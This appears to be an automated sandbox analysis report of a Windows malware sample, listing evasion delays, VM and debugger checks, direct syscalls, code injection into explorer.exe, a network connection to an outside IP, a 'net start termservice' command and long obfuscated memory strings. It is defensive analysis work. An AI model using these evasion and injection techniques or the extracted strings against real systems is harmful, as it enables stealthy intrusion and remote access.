Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\more.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw			Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cnfpnteryde			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe TID: 7312	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe TID: 8124	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6108	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 764	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2504	Thread sleep time: -180000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\explorer.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0079ED13 FindFirstFileExW,

14_2_0079ED13

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007693D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,

14_2_007693D0

Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007D8A00 rdtsc

14_2_007D8A00

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

14_2_0078A195

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Code function: 0_2_0079A032 mov eax, dword ptr fs:[00000030h]	0_2_0079A032
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007D8A00 mov eax, dword ptr fs:[00000030h]	14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078DB50 mov eax, dword ptr fs:[00000030h]	14_2_0078DB50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00795D42 mov eax, dword ptr fs:[00000030h]	14_2_00795D42

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0078A195
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0078E87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0078E87C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_007898A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_007898A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 188.114.97.3 80

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\explorer.exe

14_2_00767EB0

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtProtectVirtualMemory: Direct from: 0x6E5D2C38	Jump to behavior
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	NtProtectVirtualMemory: Direct from: 0x6E5B2D04	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtSetInformationThread: Direct from: 0x79ACD3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtQuerySystemInformation: Direct from: 0x517AFF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtProtectVirtualMemory: Direct from: 0x6C86214E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtSetTimerEx: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	NtQueryInformationToken: Direct from: 0x6C6980B4	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 4348 base: B079C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 4348 base: 9F0008 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 3492 base: B079C0 value: 55	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: PID: 3492 base: 3129008 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F0008	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3129008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0078A37F cpuid

14_2_0078A37F

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_007A222E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_007A2354
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_007A245A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_0079842E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_007A2529
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_007A1BC8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,	14_2_007A1DC3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_007A1E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_007A1EB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_007A1F50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: EnumSystemLocalesW,	14_2_00797F0C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_007A1FDB

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9c813d63 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bca94d0c VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\be3cb5d2 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,

14_2_0076E8D0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0077F060 Sleep,RegOpenKeyExA,RegCloseKey,GetUserNameA,GetModuleFileNameA,

14_2_0077F060

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0079E430 _free,_free,_free,GetTimeZoneInformation,_free,

14_2_0079E430

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_007691B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,

14_2_007691B0

Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Contains functionality to start a terminal service

Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: explorer.exe	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: net start termservice
Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn 